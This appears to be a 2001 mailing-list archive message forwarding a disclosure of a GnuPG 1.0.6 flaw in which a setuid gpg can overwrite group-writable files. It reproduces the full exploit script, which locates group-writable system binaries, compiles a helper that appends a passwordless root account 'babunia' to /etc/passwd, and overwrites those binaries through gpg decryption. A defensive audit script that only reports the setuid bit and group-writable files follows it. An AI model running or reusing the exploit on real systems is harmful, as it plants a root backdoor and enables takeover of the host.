GnuPG exploit [Fwd: Possible problem with GnuPG 1.0.6]

Renato Martini rmartini@cipsga.org.br
Sun Dec 30 19:30:01 2001


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160


Hi ALL!

I received this "possible problem" in the GnuPG code, and its exploit...

Did anybody here read this forwarded message?

thanks

---------
  __|_ _| _ \  __|  __|   \    | Renato Martini ::: Diretor Administrativo
 (     |  __/\__ \ (_ |  _ \   | http://www.cipsga.org.br
\___|___|_|  ____/\___|_/  _\  | http://gnupg.unixsecurity.com.br
-----------------------------------------------------------------------
"O Imagination, you who play your bold game with times and distances!"
                         (Gabriele d'Annunzio)


---------- Forwarded message ----------
Date: Sat, 29 Dec 2001 16:27:39 -0200
From: Renato Murilo Langona <renato@linuxsecurity.com.br>
To: rmartini@cipsga.org.br
Subject: [Fwd: Possible problem with GnuPG 1.0.6]

Przemyslaw Frasunek wrote:
>
> Hello,
>
> I've just found out about strange behaviour with GnuPG 1.0.6 installed setuid
> (default on Mandrake, probably others?). When decrypting a file, it allows
> overwriting any group-writeable file in the system.
>
> It works for me on Mandrake 8.1, because a few system binaries are
> installed group-writeable (especially smbmount and smbumount). Exploit
> attached.
>
> #!/bin/sh
>
> # babcia padlina 2001
> # especially for pcoa :)
> #
> # GnuPG when installed setuid allows overwriting any group-writable
> # files.
> #
> # Tested on generic Mandrake 8.1
>
> if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then
>   echo "GnuPG not installed or not setuid."
>   exit 1
> fi
>
> if [ ! -x /usr/bin/gcc ]; then
>   echo "gcc not installed."
>   exit 1
> fi
>
> echo "Looking for group-writeable binaries..."
> echo
>
> BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 2>/dev/null`
>
> if [ "X$BINS" != "X" ]; then
>   echo "$BINS"
> else
>   echo "Sorry, this system is not exploitable."
>   exit 1
> fi
>
> echo
> echo "Compiling helper binary..."
> echo
>
> cat > own.c << __EOF__
> main() { if (!getuid()) { system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd"); } }
> __EOF__
>
> /usr/bin/gcc -o own own.c > /dev/null 2>&1
>
> if [ ! -x own ]; then
>   echo "Compilation failed."
>   exit 1
> fi
>
> rm -f own.c
>
> echo "Overwriting binaries... Please confirm each one."
> echo
>
> for i in $BINS; do
>   rm -f own.gpg
>   echo owned | gpg --passphrase-fd 0 -c own
>   echo owned | gpg --passphrase-fd 0 -o $i own.gpg
> done
>
> rm -f own own.gpg
>
> echo
> echo "Looks like everything is done. When root will run any of above"
> echo "binaries, user babunia will be added with root privs."
>
> --
> * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
> * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8L2uEYogE2yD8bPYRAwp7AJ4pTde+40i4jBV+f8WxXrbJ8SPvAgCgzn3V
7iDkoCVT+jITP23zCHezBqI=
=xaIc
-----END PGP SIGNATURE-----
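The report above combines two conditions: a gpg binary installed setuid, and system binaries that are group-writable. The following audit script is an added defensive example, not code from the mailing-list post or from the GnuPG project. It checks both conditions on a host and prints the chmod commands an administrator would use to close them, without modifying anything. The gpg path /usr/bin/gpg (taken from the post) and the GPG_BIN override variable are assumptions of this example.

```shell
#!/bin/sh
# Added defensive audit example (not part of the original post or of GnuPG).
# Reports (1) whether the gpg binary carries the setuid bit and (2) which
# regular files in system binary directories are group-writable, then prints
# the remediation commands. Nothing on the system is changed by this script.

# Print "setuid" if FILE has the setuid bit set, "ok" otherwise.
# Returns 1 (prints nothing) when FILE does not exist.
setuid_state() {
    f=$1
    [ -e "$f" ] || return 1
    if [ -u "$f" ]; then
        echo setuid
    else
        echo ok
    fi
}

# List regular files under the given directories whose group-write bit is set.
# This is the same discovery step the report's script uses, reused here for
# detection; missing directories are skipped silently.
group_writable_files() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f -perm -0020 2>/dev/null
    done
}

# Number of group-writable regular files under the given directories.
group_writable_count() {
    group_writable_files "$@" | wc -l | tr -d ' '
}

# Full report for the gpg binary (GPG_BIN, default /usr/bin/gpg, an assumed
# path) and the given directories. Remediation is printed, not executed:
#   chmod u-s <gpg>  removes the setuid bit that makes the overwrite run as root
#   chmod g-w <file> removes the group-write bit the overwrite relies on
audit_report() {
    gpg=${GPG_BIN:-/usr/bin/gpg}
    state=$(setuid_state "$gpg" 2>/dev/null || echo missing)
    echo "gpg binary $gpg: $state"
    [ "$state" = setuid ] && echo "  fix: chmod u-s $gpg"
    echo "group-writable files:"
    group_writable_files "$@" | while IFS= read -r f; do
        echo "  $f"
        echo "  fix: chmod g-w $f"
    done
}

# Stand-alone use: audit the directories the report's script searched.
audit_report /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin
```

Run it as an unprivileged user first; files that find cannot read are skipped, so a root run gives the complete picture. A clean host prints "ok" for the gpg binary and an empty group-writable list.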